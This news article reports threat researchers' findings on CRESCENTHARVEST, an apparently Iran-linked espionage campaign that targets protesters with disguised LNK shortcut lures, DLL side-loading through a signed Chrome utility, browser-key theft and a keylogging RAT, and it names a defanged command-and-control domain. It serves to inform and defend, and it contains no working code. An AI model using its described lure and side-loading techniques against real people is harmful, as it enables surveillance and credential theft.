New Cyber Espionage Campaign Targeting Iranian Protesters
Recent findings from cybersecurity specialists have unveiled a campaign known as CRESCENTHARVEST, which appears to specifically target individuals involved in Iran’s ongoing protests. The campaign is primarily aimed at stealing information and establishing long-term espionage efforts.
Surveillance Attempts Post-Protests
The Acronis Threat Research Unit (TRU) reported that they began observing these malicious activities shortly after January 9. The attacks are engineered to deliver a harmful payload functioning as a remote access trojan (RAT), posing a significant risk by enabling attackers to execute commands, log keystrokes, and extract sensitive data. At this stage, it’s unclear if the attackers achieved any success.
Exploiting Emotional Appeals
Such campaigns exploit pressing geopolitical events to increase their effectiveness. According to researchers Subhajeet Singha, Eliad Kimhy, and Darrel Virtusio, victims are lured into clicking on compromised .LNK files disguised as protest-related images or videos.
These files are cleverly bundled with genuine media and a Farsi-language document portraying updates from “the rebellious cities of Iran.” By framing their approach in favor of the protests, attackers aim to enhance their credibility and attract Farsi-speaking individuals seeking information about the ongoing unrest.
Attribution and Historical Context
While the CRESCENTHARVEST campaign is not yet tied to specific perpetrators, it is believed to stem from an Iran-affiliated threat group. This campaign marks the second incident where distinct individuals have been targeted after the nationwide protests that erupted in late 2025.
A preceding investigation by French cybersecurity firm HarfangLab identified another threat group, RedKitten, which similarly focused on NGOs and individuals documenting human rights abuses within Iran. Their method involved deploying a custom backdoor referred to as SloppyMIO.
Initial Access Techniques
Acronis has not identified the precise means of initial access used for distributing the malware. However, it is suspected that the attackers rely on spear-phishing techniques or prolonged social engineering. In these strategies, attackers build rapport over time with their intended victims before dispatching harmful payloads.
Groups such as Charming Kitten and Tortoiseshell are known for their sophisticated social-engineering methods, often using fake personas and cultivating trust over extended periods before executing their malevolent plans.
Details of the Deceptive Mechanism
The attack chain begins with a malicious RAR archive purporting to contain details about the protests. This archive includes various images and videos, alongside two Windows shortcut (LNK) files deceptively labeled as image or video files using a double extension tactic (.jpg.lnk or .mp4.lnk).
Once opened, these misleading files trigger PowerShell commands that retrieve another ZIP archive while simultaneously displaying a seemingly harmless image or video, creating a false sense of security for the victim.
Within this ZIP archive lies a legitimately signed binary from Google, known as software_reporter_tool.exe, used as part of Chrome’s cleanup utility, along with several DLL files. Among these is a rogue library designed to achieve the attackers’ end goals.
Noteworthy Components of the Malware
The malware includes:
-
urtcbased140d_d.dll: A C++ implant capable of extracting and decrypting Chrome’s app-bound encryption keys via COM interfaces. Its design shares similarities with an open-source project named ChromElevator.
-
version.dll (referred to as CRESCENTHARVEST): This remote access tool monitors installed antivirus software, lists local user accounts, gathers system metadata, collects browser credentials, and logs keystrokes.
Communication with Command and Control
CRESCENTHARVEST utilizes Windows Win HTTP APIs to communicate with its command-and-control server, identified as servicelog-information[.]com. This design helps it blend in seamlessly with standard web traffic.
Some of the malicious commands supported by the malware include:
- Anti: Conducts anti-analysis measures.
- His: Gathers browser history.
- Dir: Lists directories.
- GetUser: Retrieves user details.
- KeyLog: Initiates keylogging capabilities.
Acronis described the CRESCENTHARVEST campaign as part of an enduring trend of suspected state-sponsored cyber espionage aimed at activists, journalists, and communities in the diaspora worldwide. The tactics observed in this campaign—such as initial access via LNK files, DLL side-loading, credential theft, and social engineering—reflect established methods commonly employed in cyber warfare aligned with current global events.
